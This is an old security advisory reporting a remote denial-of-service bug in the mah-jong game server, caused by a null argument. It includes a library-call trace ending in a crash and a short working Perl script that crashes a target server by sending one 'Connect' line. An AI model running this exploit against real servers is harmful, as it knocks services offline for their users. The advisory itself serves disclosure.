======================================== 
                              Ph4nt0m Security Advisory #2003--9-9 
                            ======================================== 

                               mah-jong server --remote dos vuln

By jsk, in ph4nt0m.net(c) Security. 
E-mail: jsk[at]ph4nt0m.net
Advisory Number  : pst-2003--10-12-007 
Program Name     : mah-jong 
Version          : all versions(the new vesion 1.6 is vuln)(can't path it in DSA-378-1)
Type             : remote dos 
OS Affected      : debian or other os
***************************************************************************** 
Description : it is a null argv[] vuln
***************************************************************************** 
Details： 
***************************************************************************** 
.............

read(4, "C", 1)                                  = 1
read(4, "o", 1)                                  = 1
read(4, "n", 1)                                  = 1
read(4, "n", 1)                                  = 1
read(4, "e", 1)                                  = 1
read(4, "c", 1)                                  = 1
read(4, "t", 1)                                  = 1
read(4, " ", 1)                                  = 1
read(4, "1", 1)                                  = 1
read(4, "0", 1)                                  = 1
read(4, "3", 1)                                  = 1
read(4, "4", 1)                                  = 1
read(4, " ", 1)                                  = 1
read(4, "0", 1)                                  = 1
read(4, "\r", 1)                                 = 1
read(4, "\n", 1)                                 = 1
strlen("Connect 1034 0\r\n")                     = 16
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
strcmp("Connect", "SaveState")                   = -16
strcmp("Connect", "LoadState")                   = -9
strcmp("Connect", "Connect")                     = 0
malloc(16)                                       = 0x08080db0
sscanf(0x080845f8, 0x08076fa0, 0xbffff77c, 0xbffff784, 1) = 1
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
sscanf(0x080845fd, 0x08076fa0, 0xbffff77c, 0xbffff784, 1) = 1
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1)   = 0x40157418
strncmp(NULL, "Robot", 5 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
**********************************************************************************************
exploit:

#!/usr/bin/perl -s
use IO::Socket;
# test it in slackware 9.0
# DOS-test--mj1.6--code by jsk
# mahJong 1.6, all versions of mahjong
if(!$ARGV[0] || !$ARGV[1])
 { print "usage: ./dosmj.pl <host> <port>\n"; exit(-1); }

$host = $ARGV[0];
$port = $ARGV[1];
$jsk ="Connect 1034 0";
$socket = new IO::Socket::INET (
 Proto => "tcp",
 PeerAddr => $host,
 PeerPort => $port);

die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "Connect 1034 0"; 
print $socket "\r\n";
close($socket);

**********************************************************************************************
path : http://www.stevens-bradfield.com/MahJong/

       Julian Bradfield or securityteam of debian will path it.